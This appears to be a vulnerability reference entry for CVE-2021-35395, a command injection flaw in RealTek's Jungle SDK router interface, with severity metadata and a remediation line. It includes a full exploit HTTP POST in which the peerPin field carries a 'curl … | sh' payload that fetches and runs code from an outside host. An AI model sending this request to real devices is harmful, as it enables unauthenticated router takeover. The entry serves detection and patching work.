| Title | RealTek Jungle SDK - Arbitrary Command Injection |
|---|---|
| Author | king-alexander |
| Severity | Critical |
| Impact | Unauthenticated attackers can execute arbitrary system commands via command injection in the peerPin parameter, leading to complete router compromise and control over network traffic. |
| Remediation | Apply the latest security patches or updates provided by RealTek to fix the vulnerability. |
| CVSS Score | 9.8 |
| EPSS Score | 0.93663 |
| CVE ID | CVE-2021-35395 |
| Tags | cve2021 cve realtek rce kev vkev vuln |
There is a command injection vulnerability on the “formWsc” page of the management interface. Successful exploitation of this vulnerability could lead to remote code execution and compromise of the affected system.
POST /goform/formWsc HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh, Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.6 Safari/605.1.15
Connection: close
Content-Length: 172
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
submit-url=%2Fwlwps.asp&resetUnCfg=0&peerPin=12345678;curl http://d5jnuhhle0o4hc3h3t2g365htimoys5hi.oast.me | sh;&setPIN=Start+PIN&configVxd=off&resetRptUnCfg=0&peerRptPin=
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2021/CVE-2021-35395.yaml
🦈 Packet Capture: ⬇️ Download cve-2021-35395.pcap
N/AN/A